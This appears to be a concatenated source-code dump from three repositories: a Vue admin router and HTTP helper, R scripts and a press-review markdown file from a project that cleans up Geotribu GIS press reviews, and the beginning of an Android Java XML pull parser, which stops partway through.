}).catch((error) => {
reject(error)
})
})
}
export default user
<file_sep>/src/router/modules/demo.js
/** When your routing table is too long, you can split it into small modules**/
import Layout from '@/views/layout/Layout'
const demoRouter = [
{
path: '/demo',
component: Layout,
name: 'Demo',
meta: {
title: 'demo',
icon: 'windows'
},
alwaysShow: true,
children: [
{
path: 'news',
component: () => import('@/views/demo/news'),
name: 'NewsManage',
meta: {
title: 'newsManage',
icon: 'file-word',
roles: ['demo:news:all']
}
}
]
}
]
export default demoRouter
<file_sep>/src/utils/httpUtil.js
import request from '@/utils/request'
import qs from 'qs'
/**
* GET request
* @param {request URL} url
* @param {request params; an object converted into url query parameters} params
*/
const getRequest = (url, params) => {
return new Promise((resolve, reject) => {
request({
method: 'get',
url,
params
}).then(({ data: res }) => {
resolve(res)
}).catch(err => {
reject(err)
})
})
}
/**
* POST/PUT/DELETE request, sending an object
* @param {request URL} url
* @param {request params, an object} params
* @param {request method, POST by default; PUT or DELETE may also be given} method
*/
const postRequest = (url, params, method = 'post') => {
return new Promise((resolve, reject) => {
request({
method,
url,
data: params
}).then(({ data: res }) => {
resolve(res)
}).catch(err => {
reject(err)
})
})
}
/**
* POST/PUT/DELETE request, sending a form
* @param {request URL} url
* @param {request params; an object converted into form data} params
* @param {request method, POST by default; PUT or DELETE may also be given} method
*/
const postFormRequest = (url, params, method = 'post') => {
return new Promise((resolve, reject) => {
request({
method,
url,
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
transformRequest: [function(data) {
data = qs.stringify(data)
return data
}],
data: params
}).then(({ data: res }) => {
resolve(res)
}).catch(err => {
reject(err)
})
})
}
export default {
getRequest,
postRequest,
postFormRequest
}
|
ffddfa5f9d073f91dec136e078d223655fd95ea4
|
[
"JavaScript"
] | 3 |
JavaScript
|
swxu2005/vue-element-admin
|
73276f2d71669ab96220f3f20ea6edebcb95c0fa
|
62753c9eb7a1bf9e57fcb11583d531bcc593c8b9
|
refs/heads/master
|
<file_sep>### Song Map
[Song Map](http://www.wearedorothy.com/art/song-map-signed-and-stamped-limited-edition/) est une carte urbaine réalisée par le collectif [Dorothy](http://www.wearedorothy.com/) où les noms de rues ont été remplacés par des titres de chansons. L'avenue la plus importante est bien entendu Highway to hell! Pour les amateurs de musique, la carte peut également s'accompagner d'une playlist concoctée par les auteurs
<file_sep># Issue : https://github.com/geotribu/website/issues/443
# PR : https://github.com/geotribu/website/pull/444
# Fix the heading levels
# Remove the old #news anchors
# Add the missing accessibility attributes
# Fix the old image URLs
library(tidyverse)
library(stringr)
source("helpers.R", encoding = "UTF-8")
year <- 2011
inputFolder <<- "../../rdp/"
outputFolder <<- "../../website/content/rdp"
reformatYear <- function(year, inputFolder, outputFolder) {
rdps <- listRdpsForYear(year)
  # Transform file by file
for(i in 1:length(rdps)) {
rdp <- rdps[i]
message(">> ", i, " : ", rdp)
reformatRdp(rdp, outputFolder)
}
}
# Reformat all the rdps of a year
reformatYear(year, inputFolder, outputFolder) # reformat one year
# Reformat a single rdp
# reformatRdp("../../website/content/rdp/2011/rdp_2011-12-23.md") # reformat one rdp
# reformatRdp("../../rdp//2012/rdp_2012-06-04.md", 2012, inputFolder, outputFolder) # reformat one rdp<file_sep>source("helpers.R")
library(stringr)
library(tidyverse)
lines
rdp <- "../../rdp/2011/rdp_2011-12-23.md"
lines <- readRdp(rdp)
newLines <- reformatLinks(lines)
myLine <- lines[101]
# # myLine <- 'toto [logo](titi) toto [logo test22](https://tata) toto [](https://tutu23)'
# httpLinks <- str_extract_all(lines, "\\[\\S*\\s?\\S*\\]\\(\\S+\\)") %>% unlist
# imageLinks <- str_extract_all(lines, "\\!\\[\\S*\\s?\\S*\\]\\(\\S+\\)") %>% unlist
# links <- c(httpLinks, imageLinks)
# Accessibility ----
imgLink1 <- ""
imgLink2 <- ''
isAccessible(imgLink1)
isAccessible(imgLink2)
if(!isAccessible(imgLink1)) {
addAccessibility(imgLink1)
}
addAccessibility(imageLinks[12])
addAccessibility(imageLinks[1])
test <- sapply(imageLinks, addAccessibility) %>% as.character
test
# Answer ----
# Appendices ----<file_sep># Thumbnail relocation tests
rdp <- "../../rdp/2011/rdp_2011-12-23.md"
# rdp <- "../../rdp/2011/rdp_2011-12-30.md"
# rdp <- "../../rdp/2011/rdp_2011-03-18.md"
# rdp <- "../../rdp/2011/rdp_2011-03-18.md"
source("helpers.R", encoding = "UTF-8")
lines <- readRdp(rdp)
# grepl("gvSIG", lines) %>% which
# lines[39]
# reformatLine(lines[39])
# newLines <- reformatTitles(lines)
# sapply(newLines, length)
# PUT THE THUMB INTO THE POST
lines <- reformatTitles(lines)
lines <- relevelTitles(lines)
lines <- reformatLeadingSpace(lines)
lines <- relocateThumbs(lines)
lines <- reformatLinks(lines)
grep("Earth as art", lines) -> w
lines[w]
#
# grepl("gvSIG", lines) %>% which -> w
# lines[w]
# reformatRdp(rdp, outputFolder)
writeRdp(lines, "temp.md")
<file_sep># Géotribu
Reformat, clean and analyse the [Géotribu](http://static.geotribu.fr/) press reviews
## [`reformat.R`](https://github.com/datagistips/geotribu/blob/master/reformat.R)
Issue : https://github.com/geotribu/website/issues/443
PR : https://github.com/geotribu/website/pull/444
### Examples of badly formatted rdps
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-01-21.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-01-28.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-02-04.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-02-11.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-03-18.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-05-13.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-06-03.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-06-24.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-07-08.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-07-15.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-07-22.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-08-12.md **
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-08-26.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-09-09.md **
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-09-16.md - spaces
- ...
#### 21 January 2011
- Before: https://github.com/geotribu/website/blob/fenfyx2/content/rdp/2011/rdp_2011-01-21.md
- After: https://github.com/geotribu/website/blob/fenfyx2/content/rdp/2011/rdp_2011-01-21-new.md
- Log: https://github.com/geotribu/website/blob/fenfyx2/content/rdp/rdp_2011-01-21-log.md
#### 23 December 2011
- Before: https://static.geotribu.fr/rdp/2011/rdp_2011-12-23/
- After: https://preview-pullrequest-444--geotribu-preprod.netlify.app/rdp/2011/rdp_2011-12-23/
### See the changes
https://preview-pullrequest-444--geotribu-preprod.netlify.app/rdp/2011/rdp_2011-12-23/
### Handled cases
Reformats the following cases:
### L'Open Data en image** lorem ipsum
## L'Open Data en image** lorem ipsum
L'Open Data en image** lorem ipsum
**OpenLayers Mobile** lorem ipsum
**gvSIG** lorem ipsum
## TODO
- [ ] Create functions for reformatTitle, relevelTitle
- [ ] Reposition the thumbnails
- [x] Reformat the titles
- [ ] Find dead links: images, ...
- [ ] Build a JSON from an rdp:
- thumbnail
- category
- links
- images
- identified technologies
- Release the JSON
- [ ] Reposition the log
- [ ] relocateThumbs broken
## VIZ
- Count the categories, barplot with d3
- see which adjective follows "carte"
- see the most frequent domain names
- see which technologies were covered
- track the quantity of rdps over time, and where there are none
- track the keywords QGIS, MapBox, IGN, OpenData, Data, Data Science, artificial intelligence
- The publication days of the rdp
- beeswarm or temporal word cloud
- topic modeling?
- Number of words
- Number of news items
- Depending on the logo: type of news
- Turn the news items into JSON
- "Sortie de la semaine" is at level 4, should be level 2.
<file_sep>---
title: "Revue de presse du 23 décembre 2011"
authors:
- Geotribu
categories:
- revue de presse
date: 2011-12-23
description: "Revue de presse du 23 décembre 2011"
tags:
- GDAL
- GeoExt
- GeoNetwork
- GeoServer
- GéoSource
- GeoTools
- gvSIG
- HTML5
- OGR
- open data
- pgRouting
---
# Revue de presse du 23 décembre 2011
{: .img-rdp-news-thumb }
Vous êtes déjà en vacances ou encore au bureau ? Mais est-ce une raison pour manquer la revue de presse de Geotribu. Cette semaine, nous aborderons notamment, la librairie Google Vector Layer, les journées internationales gvSIG, de l'Open Data mais aussi les sorties de la semaine.
Bonne lecture :book:.
----
## Client
### Google Vector Layers
{: .img-rdp-news-thumb }
Ajouter des données KML à Google Maps est un jeu d'enfant. Mais cela se corse quand vous souhaitez intégrer d'autres formats provenant par exemple d'ArcGIS Server, GeoCommons ou encore CartoDB.
Si vous êtes dans ce cas, sachez que <NAME> offre depuis peu une nouvelle librairie, nommée [Google Vector Layer](http://geojason.info/google-vector-layers/), permettant notamment de faciliter l'ajout de différentes sources et surtout la gestion de gros volumes de données. Pour cela, Google Vector Layer ne va pas afficher l'ensemble des données disponibles mais seulement celles correspondant à l'extension de la carte. Mais les potentialités de cette librairie ne s'arrêtent pas là.
En effet, elle offre également un moteur de template pour les infobulles, une gestion facilitée de la symbologie ainsi qu'une intégration plus simple des données temps réel. Mais le plus simple est je pense de jeter un œil aux [démos](http://geojason.info/google-vector-layers/demos/) disponibles et si vous êtes convaincus, sachez que le code source est disponible sur [GitHub](https://github.com/JasonSanford/google-vector-layers)
### Cartographie en HTML5
{: .img-rdp-news-thumb }
Nous avions déjà eu l'occasion d'aborder à plusieurs reprises la librairie [D3](http://mbostock.github.com/d3/). Celle-ci permet notamment de transformer vos données brutes en diagramme intelligible et compréhensible. Les [modes de représentation](http://mbostock.github.com/d3/ex/) sont multiples et il est bien évidemment possible d'utiliser la carte comme média de communication ([carte choroplète](http://mbostock.github.com/d3/ex/choropleth.html), [cartogram](http://mbostock.github.com/d3/ex/cartogram.html)).
Néanmoins, ces exemples sont malheureusement figés. Impossible de zoomer ou de se déplacer. C'était sans compter le talent de [tokumine](http://vizzuality.com/team/stokumine) qui nous offre une [série d'exemples](https://github.com/Vizzuality/HTML5-experiments) alliant d3 et interactivité. Le code source utilisé est également disponible
### gvSIG
{: .img-rdp-news-thumb }
La 7ème édition des journées internationales de gvSIG s'est déroulée du 30 novembre au 2 décembre derniers à Valence. Les publications, articles, posters et présentations de l’évènement sont disponibles sur le site officiel. Attention, hispanophobes s'abstenir car que la page soit disponible [en anglais](http://jornadas.gvsig.org/comunicaciones/reports/view?set_language=en) et [en espagnol](http://jornadas.gvsig.org/comunicaciones/ponencias/view?set_language=es), ne change rien : tous les contenus sont en espagnol. L'évènement se déroulait à Valence et le projet est profondément ancré dans la langue de Cervantès.
Qu'importe, le logiciel est disponible en beaucoup de langues différentes et gagnerait à être davantage connu des aficionados de Molière ! Pour Noël, offrez-vous (gratuit et autonome) une découverte du cousin de QGIS : [votre cadeau opensource](http://www.gvsig.org/web/) !
### Calculer des itinéraires avec OpenStreetMap
{: .img-rdp-news-thumb }
Cette semaine, grâce à [<NAME>](http://www.portailsig.org/users/gene) du [PortailSIG](http://www.portailsig.org), nous apprendrons comment [calculer un itinéraire](http://www.portailsig.org/content/osm2po-ou-le-calcul-simple-d-itineraires-avec-les-donnees-openstreetmap) à partir des données [OpenStreetMap](https://www.openstreetmap.org). Pour cela l'auteur nous présente un outil nommé [osm2po](http://osm2po.de/). Ce dernier a la particularité d'être à la fois un moteur de routage (ça se dit ??) mais aussi un convertisseur permettant d'exploiter les résultats obtenus dans Postgresql.
Mais le mieux, est de consulter le billet de Martin qui présente toutes les étapes nécessaires. Pour ceux qui veulent en savoir un peu plus sur PgRouting, un autre article est disponible sur [le blog "l'aménagerie"](http://elcep.legtux.org/?p=324). Remercions dans tous les cas, [UnderDark](https://twitter.com/#!/underdarkGIS), la contributrice anglophone à l"origine du contenu des deux cas présentés. N'hésitez pas à visiter [son blog : c'est une mine](http://underdark.wordpress.com/)
----
## Open Data
{: .img-rdp-news-thumb }
Bien que le mouvement Open Source et Open Data soient par nature différents, il n'empêche que la philosophie qui les anime et la même. Preuve en est, la plateforme qui propulse OpenData.gov, [l'Open Data Américain, devient Open Source](http://www.bulletins-electroniques.com/actualites/68571.htm). Cette libération du code est, comme j'aime à le rappeler lors de mes interventions, un contrat gagnant/gagnant pour tout le monde. En effet, si une communauté suffisante se crée, cela permettra de faire évoluer l'outil à moindre coût et pour les utilisateurs c'est l'assurance de disposer d'une plateforme pérenne. Le [code source](https://github.com/opengovplatform/opengovplatform) est disponible sur GitHub.
### Debug data.gouv.fr
{: .img-rdp-news-thumb }
Depuis l'ouverture du portail data.gouv.fr il y a de cela 2 semaines, beaucoup de critiques pleuvent. Il faut dire qu'entre des formats propriétaires, des données illisibles à cause de leur qualité médiocre etc. il y a de quoi alimenter une levée de boucliers ! Si vous êtes aussi du genre à râler, [Regards citoyens](http://www.regardscitoyens.org/) a lancé un site pour contribuer à améliorer le portail de l'opendata francais : [Debug data.gouv.fr](http://www.debug-data-gouv.fr/).
Un petit retour sur les données disponibles lors de leur intégration dans [Data-Publica](http://www.data-publica.com/) est disponible sur [le blog de la société](http://www.data-publica.com/content/2011/12/data-publica-importe-et-indexe-l%E2%80%99ensemble-des-donnees-de-data-gouv-fr/)
----
## Sortie de la semaine
### Sortie de GDAL 1.9 beta 2 et petit récapitulatif des ressources importantes du projet
{: .img-rdp-news-thumb }
On se rapproche doucement de la "release" stable de GDAL 1.9. Celle-ci apporte des nouveautés intéressantes. Ainsi vous pouvez par exemple, [utiliser des données distantes](http://erouault.blogspot.com/2011/12/seamless-access-to-remote-global-multi.html) puis les consolider sans avoir besoin de télécharger sur votre poste. Pour un aperçu de l'ensemble des nouvelles fonctionnalités, nous vous invitons à consulter [les infos liées à la release](http://trac.osgeo.org/gdal/wiki/Release/1.9.0-News). Même si ce n'est pas lié directement aux nouvelles fonctionnalités, nous en profitons pour vous faire découvrir comment faire [des effets de relief](http://linfiniti.com/2011/12/creating-coloured-rasters-with-gdal/) avec GDAL. Pour le manuel de référence en français de la version 1.9, allez sur <http://gdal.gloobe.org/>. Si vous avez besoin de manipuler ogr/gdal via Python, un [petit rappel sur l'API](http://gdal.org/python/) ne peut pas faire de mal. Toujours en Python, si vous voulez séparer vos environnements, [ce guide](http://tylerickson.blogspot.com/2011/09/installing-gdal-in-python-virtual.html) sera votre ami. Nous vous rappelons aussi l'existence de [ce très bon guide](http://georezo.net/forum/viewtopic.php?pid=162315#p162315) sur la partie raster. N'oublions pas non plus [le site officiel du projet](http://www.gdal.org). N'hésitez pas à nous faire remonter d'autres sources sur GDAL si nous les avons oubliés
### Fiona passe en 0.5
{: .img-rdp-news-thumb }
Non ce n'est pas de la fiancée de Shrek dont nous allons parler (ok, ok je sors mais c'était tentant !) mais d'une surcouche ajoutée à OGR. [<NAME>](http://sgillies.net/), participant actif et bien connu de l'OpenSource est l'auteur de cette librairie. [Fiona](https://github.com/sgillies/Fiona) se veut être une alternative plus élégante à l'API existante. Au passage, j'en profite également pour signaler ce [post](http://www.neogeo-online.net/blog/archives/1649/) paru sur NeoGeo Online qui aborde notamment cette librairie
### Nouvelle version de GeoTools
{: .img-rdp-news-thumb }
La librairie géospatiale en Java de l'OSGeo sort en version 2.7.4 en corrigeant quelque 39 bugs et en apportant quelques améliorations et nouveautés.
[Site de GeoTools](http://geotoolsnews.blogspot.com/2011/12/geotools-274-released.html)
### GeoServer version 2.1.3
{: .img-rdp-news-thumb }
Restons dans le domaine de la correction de bugs avec la [sortie de GeoServer en version 2.1.3](http://blog.geoserver.org/2011/12/21/geoserver-2-1-3-released/). Néanmoins, nous pouvons noter quelques améliorations comme l'ajout de l'authentification pour les couches WMS en cascade ou encore le support de processus WPS asynchrones.Plus d'infos sont disponibles sur le [changelog](http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10311&version=17865). Il faut aussi noter que Geoserver dispose maintenant d'une documentation en français issue de la traduction de la version anglaise. Ce travail a été effectué dans le cadre de Georchestra, une IDS (Infrastructure de Données Spatiales). Pour en savoir plus, allez sur [l'annonce officielle](http://blog.georchestra.org/post/2011/12/17/GeoServer-%3A-traduction-de-la-doc-en-fran%C3%A7ais)
### Nouvelle version de GéoSource
{: .img-rdp-news-thumb }
Le "Geonetwork à la sauce française", développé principalement par le BRGM, vient aussi de publier une nouvelle version. De très bonnes nouvelles en termes de performance et de gros efforts sur la documentation et l'assistance sont au menu de cette dernière mouture. [L'excellent NeoGeo passe en revue les principales nouveautés de cette version](http://www.neogeo-online.net/blog/archives/1660/)
### GeoExt version 1.1
{: .img-rdp-news-thumb }
Lors de la dernière revue de presse, nous vous annoncions la sortie de la Release Candidate. Cette semaine c'est au tour de la version [stable](http://geoext.blogspot.com/2011/12/announcing-geoext-11.html). Tous les détails sur cette nouvelle version [ici](http://trac.geoext.org/wiki/Release/1.1/Notes). Le code source est téléchargeable sur [Github](https://github.com/geoext/geoext)
----
## Divers
### The Nine Eyes of Google Street View
{: .img-rdp-news-thumb }
La toute nouvelle maison d'éditions [<NAME>](http://jean-boite.fr/) publie une monographie de l'artiste [<NAME>](http://jonrafman.com/) inspirée de son projet [9 eyes](http://9-eyes.com/). C'est un recueil bilingue de 160 pages en couleur de photos insolites trouvées en se baladant sur Google Street View
### Song Map
{: .img-rdp-news-thumb }
[Song Map](http://www.wearedorothy.com/art/song-map-signed-and-stamped-limited-edition/) est une carte urbaine réalisée par le collectif [Dorothy](http://www.wearedorothy.com/) où les noms de rues ont été remplacés par des titres de chansons. L'avenue la plus importante est bien entendu Highway to hell! Pour les amateurs de musique, la carte peut également s'accompagner d'une playlist concoctée par les auteurs
<file_sep># Removing leading spaces ----
# 04-06-2012
rdp <- "../../rdp//2012/rdp_2012-04-06.md"
con <- file(rdp, "r", encoding = "UTF-8")
lines <- readLines(con)
close(con)
grepl("\\s{1,2}[]*", lines[4])
myLine <- lines[121]
reformatLine(lines[1])
grepl("\\s+.*", myLine)
grepl("\\s+.*", "toto")
removeLeadingSpace(myLine)
grep("mapserver", lines)
myLine <- lines[42]
myLine
# Heading levels ----
#### Sortie de la semaine
# https://github.com/geotribu/website/blob/fenfyx2/content/rdp/2011/rdp_2011-12-23.md?plain=1#L25
# #### Projets artistiques
#
# {: .img-rdp-news-thumb }
#
# ### The Nine Eyes of Google Street View
# {: .img-rdp-news-thumb <file_sep># Accessibility ----
isAccessible <- function(link) {
grepl("^\\!\\[(.*)\\]\\(.* \".*\"\\)$", link)
}
addAccessibility <- function(imgLink) {
  # Get the tail of the URL
  # e.g. for ""
  # we keep gdal.png
  stem <- gsub("\\!\\[.*\\]\\(.*/(.*)\\).*", "\\1", imgLink)
  # The name is gdal (split on the dot .)
  imageName <- strsplit(stem, "\\.")[[1]][1]
  # Replace some characters with spaces
  imageName <- gsub("-", " ", imageName)
  imageName <- gsub("_", " ", imageName)
  # Extract the image description (the alt text) if it exists
  # imgLink <- ""
  description <- gsub("\\!\\[(.*)\\].*", "\\1", imgLink)
  # If the description is empty, use the image name (without its extension)
  description <- ifelse(description == "", imageName, description)
  # Get the http://... link
  link <- gsub("^.*\\((.*)\\).*", "\\1", imgLink)
  # The first part is the one between square brackets: ![toto]
  part1 <- sprintf("![%s]", description)
  # The second part is the one between parentheses.
  # The description is appended to it as a title
  part2 <- sprintf("(%s \"%s\")", link, description)
  # Glue the two parts together
newLink <- paste0(part1, part2)
return(newLink)
}
reformatLinks <- function(lines) {
newLines <- lines
for(i in 1:length(lines)) {
myLine <- lines[i]
httpLinks <- str_extract_all(myLine, "\\[\\S*\\s?\\S*\\]\\(\\S+\\)") %>% unlist
imageLinks <- str_extract_all(myLine, "\\!\\[\\S*\\s?\\S*\\]\\(\\S+\\)") %>% unlist
for(imgLink in imageLinks) {
if(!isAccessible(imgLink)) {
newImgLink <- addAccessibility(imgLink)
message(imgLink, "\ndevient\n", newImgLink)
newLines[i] <- str_replace(newLines[i], fixed(imgLink), newImgLink) # !! fixed
message("---")
}
}
}
return(newLines)
}
# Leading space ----
removeLeadingSpace <- function(myLine) {
trimws(myLine, which = "left")
}
reformatLine <- function(myLine) {
newLine <- NULL
  # With or without hashtags
if(isNotWellFormatted1(myLine)) {
newLine <- reformatTitle1(myLine)
}
  # With an image at the beginning
if(isNotWellFormatted2(myLine)) {
newLine <- reformatTitle2(myLine)
}
return(newLine)
}
reformatLeadingSpace <- function(lines) {
newLines <- lines
for(i in 1:length(lines)) {
myLine <- lines[i]
    # Remove leading spaces
if(isNotWellFormatted3(myLine)) {
newLines[i] <- removeLeadingSpace(myLine)
}
}
return(newLines)
}
readRdp <- function(rdp) {
con <- file(rdp, "r", encoding = "UTF-8")
lines <- readLines(con)
close(con)
return(lines)
}
writeRdp <- function(lines, repairedRdp) {
con <- file(repairedRdp, encoding = "UTF-8")
writeLines(lines, con)
close(con)
}
relevelTitles <- function(lines) {
for(j in 1:length(lines)) {
myLine <- lines[j]
if(grepl("\\#\\#\\#\\#.*", myLine)) {
      print("LEVEL")
      w <- (j+1):(j+10)
myLines <- lines[w]
w <- which(myLines == "" | grepl("\\{\\: \\.img-rdp-news-thumb \\}", myLines))
myLines <- myLines[-w]
w <- grep("\\#+", myLines)
myLines <- myLines[w]
if(grepl("\\#\\#\\#\\s.*", myLines[1])) {
newLine <- str_replace(myLine,"^####\\s(.*)", "## \\1")
lines[j] <- newLine
message(paste0(myLine, "\n=>\n", newLine))
message("\n")
# writeLog(logFile, myLine, newLine)
}
}
}
return(lines)
}
reformatTitles <- function(lines) {
newLines <- vector(mode = "list")
for(i in 1:length(lines)) {
myLine <- lines[i]
newLine <- reformatLine(myLine)
    # Reassignment
if(is.null(newLine)) {
newLines[i] <- myLine
} else {
newLines[[i]] <- newLine
}
}
res <- unlist(newLines)
return(res)
}
reformatRdp <- function(rdp, outputFolder, inputEncoding = "UTF-8") {
# Variables
year <- gsub("^.*rdp_([0-9]*).*$", "\\1", rdp) %>% as.integer()
  # Read the RDP
lines <- readRdp(rdp)
# File name
fileName <- gsub("^.*/(.*\\.md)$", "\\1", rdp)
# Log file
logFile <- file.path(outputFolder, year, gsub(".md", "-log.md", fileName))
if(file.exists(logFile)) file.remove(logFile)
  # FIX BOLD TITLES -> H3
  lines <- reformatTitles(lines)
  # RELEVEL HEADINGS H4 -> H2
  lines <- relevelTitles(lines)
  # FIX LEADING SPACES
  lines <- reformatLeadingSpace(lines)
# RELOCATE THUMBNAILS
lines <- relocateThumbs(lines)
# REFORMAT LINKS
lines <- reformatLinks(lines)
  # Write out the new version
repairedRdp <- file.path(outputFolder, year, fileName)
writeRdp(lines, repairedRdp)
message("\n")
  # Extract an article's images (experimental)
# test <- lines[85]
# getImgs(test)
}
myLine <- "**Filtres temporels dans GvSIG"
# myLine <- "### L'Open Data en image** tototototo"
# myLine <- "## L'Open Data en image** tototototo"
# myLine <- "L'Open Data en image** tototototo"
# myLine <- " **OpenLayers Mobile**"
isNotWellFormatted1 <- function(myLine) {
grepl("^(###?\\s)?.*\\*\\*", myLine)
}
# Leading spaces, except for the YAML at the top (4 spaces)
isNotWellFormatted3 <- function(myLine) {
grepl("^\\s{1,2}(\\#|\\!|\\[|[a-z]|[A-Z]|[0-9])", myLine, perl = TRUE)
}
# countHashtags("## L'Open Data en image** tototototo")
# countHashtags("### L'Open Data en image** tototototo")
# countHashtags("#### L'Open Data en image** tototototo")
countHashtags <- function(myLine) {
n <- 0
for(i in 1:4) {
hashtags <- paste(rep("#", i), collapse="")
if(grepl(sprintf("^%s\\s.*", hashtags), myLine)) n <- i
}
return(n)
}
writeLog <- function(logFile, myLine, newLine) {
write(myLine, file = logFile, append = TRUE)
write("\n\ndevient\n\n", file = logFile, append = TRUE)
write(newLine, file = logFile, append = TRUE)
write("\n----", file = logFile, append = TRUE)
}
# "**gvSIG** La 7ème édition des journées "
isNotWellFormatted2 <- function(myLine) {
regex <- "\\s?(\\!\\[.*\\]\\(.*\\))\\*\\*(.*)\\*?\\*?(.*)"
grepl(regex, myLine)
}
reformatTitle2 <- function(myLine) {
# **gvSIG**
regex1 <- "\\s?(\\!\\[.*\\]\\(.*\\))\\*\\*(.*)\\*\\*(.*)"
# **<NAME> en direct
regex2 <- "\\s?(\\!\\[.*\\]\\(.*\\))\\*\\*(.*)"
if(grepl(regex1, myLine)) {
title <- str_replace(myLine, regex1, "### \\2")
img <- str_replace(myLine, regex1, "\\1{: .img-rdp-news-thumb }")
body <- str_replace(myLine, regex1, "\\3")
return(list(title, img, body))
} else if (grepl(regex2, myLine)) {
title <- str_replace(myLine, regex2, "### \\2")
img <- str_replace(myLine, regex2, "\\1{: .img-rdp-news-thumb }")
return(list(title, img))
}
}
relocateThumbs <- function(lines) {
newLines <- lines
for(i in 1:length(lines)) {
myLine <- lines[i]
if(grepl("^\\!\\[.*\\]\\(.*\\)\\{\\: \\.img-rdp-news-thumb \\}$", myLine)) {
print(i)
      # Take a sample of the lines
      # up to the 5th line after this one
      w <- c(i:(i+5))
      myLines <- lines[w]
      # check whether the element right after is a title
      w <- w[which(myLines != "")][2]
      # If it is a title...
      if(grepl("^\\#+.*", lines[w])) {
        title <- lines[w]
        img <- lines[i]
        # ...add the image into the body of the article
        newLines[w] <- paste0(title, "\n\n", img, "\n") # !! better to use a list
        # Comment out the original line that contains the image
newLines[i] <- sprintf("<!--%s-->", img)
}
}
}
  # Clean: remove the elements that are NA
# w <- which(sapply(newLines, is.na))
# res <- unlist(newLines)
return(newLines)
}
getNotWellFormatted <- function(lines) {
w <- which(sapply(1:length(lines), function(x) isNotWellFormatted(lines[[x]])))
return(list(w = w, lines = lines[w]))
}
reformatTitle1 <- function(myLine) {
hashtags <- rep("#", countHashtags(myLine)) %>% paste(collapse="")
if(hashtags == "") {
regex <- "^\\s?(?:\\*\\*)?(.*)\\*\\*\\s?(.*)$"
title <- str_replace(myLine, regex, "### \\1")
body <- str_replace(myLine, regex, "\\2")
} else {
regex <- sprintf("^(?:%s?\\s)?(.*)\\*\\*\\s?(.*)$", hashtags)
title <- str_replace(myLine, regex, sprintf("%s \\1", hashtags))
body <- str_replace(myLine, regex, "\\2")
}
return(list(title, body))
}
# List the folder's files for the given year
listRdpsForYear <- function(year) {
rdps <- list.files(sprintf("%s/%d", inputFolder, year), full.names = T)
rdps <- rdps[which(grepl("^(?!.*(new|old)).*$", rdps, perl = TRUE))]
rdps
}
imgPar <- function(img) {
regex <- "^.*!\\[(.*)\\]\\((.*)\\).*$"
imgLogo <- gsub(regex, "\\1", img)
s <- gsub("^.*!\\[(.*)\\]\\((.*)\\).*$", "\\2", img)
imgUrl <- gsub("^(.*)\\s?\\\"(.*)\\\"$", "\\1", s)
imgCat <- gsub("^(.*)\\s?\\\"(.*)\\\"$", "\\2", s)
img <- list(imgLogo = imgLogo, imgUrl = imgUrl, imgCat = imgCat)
return(img)
}
buildRegex <- function(i) {
  r <- "(!\\[.*\\]\\(.*\\))" # image-link pattern, repeated i times
  sprintf(".*%s.*", paste(rep(r, i), collapse=".*"))
}
countLinks <- function(test) {
r <- "(!\\[.*\\]\\(.*\\))"
n <- 0
for(i in 1:5) {
r2 <- buildRegex(i)
if(grepl(r2, test)) n <- i
}
return(n)
}
# myLine <- " {: .img-rdp-news-thumb }"
# getImgs(myLine)
getImgs <- function(test) {
n <- countLinks(test)
out <- vector(mode="list")
for(i in 1:n) {
imgLink <- gsub(buildRegex(n), sprintf("\\%d", i), test)
out[[i]] <- imgPar(imgLink)
}
return(out)
}
cleanYear <- function(year) {
l <- list.files(sprintf("%s/%d", inputFolder, year), "-new.md", full.names = T)
  for(elt in l) {
    file.rename(elt, gsub("-new.md", ".md", elt)) # the renamed file replaces the old one
  }
}
|
7a527342459c26f8f0b08ee6ec941d920013de7e
|
[
"Markdown",
"R"
] | 8 |
Markdown
|
datagistips/geotribu
|
d42c7323d87669be0949278b614e28a1e6150dca
|
5dbc7239ebf167f157da20f13a00c596b74980c3
|
refs/heads/master
|
<file_sep>package com.noodles.lynn.xml_parse;
import com.noodles.lynn.xml_parse.model.Book;
import java.io.InputStream;
import java.util.List;
/**
* Created by Lynn on 2016/4/19.
*/
public interface BookParser {
    /**
     * Parse the input stream into a list of Book objects
     * */
    public List<Book> bookParse(InputStream is) throws Exception;
    /**
     * Serialize the list of Book objects into an XML-formatted string
     * */
    public String serialize(List<Book> books) throws Exception;
}
<file_sep>package com.noodles.lynn.xml_parse;
import android.util.Xml;
import com.noodles.lynn.xml_parse.model.Book;
import org.xmlpull.v1.XmlPullParser;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.List;
/**
* Created by Lynn on 2016/4/19.
*/
public class Pull_BookParser implements BookParser {
@Override
public List<Book> bookParse(InputStream is) throws Exception {
List<Book> books = null;
Book book = null;
// XmlPullParserFactory factory = XmlPullParserFactory.newInstance();
// XmlPullParser parser = factory.newPullParser();
        XmlPullParser pullParser = Xml.newPullParser(); // create a parser instance via android.util.Xml
        pullParser.setInput(is, "UTF-8"); // set the input stream and its encoding
        int eventType = pullParser.getEventType(); // returns the event type as an int
while(eventType != XmlPullParser.END_DOCUMENT){
switch(eventType){
case XmlPullParser.START_DOCUMENT:
books = new ArrayList<Book>();
break;
case XmlPullParser.START_TAG:
if(pullParser.getName().equals("book")){
book = new Book();
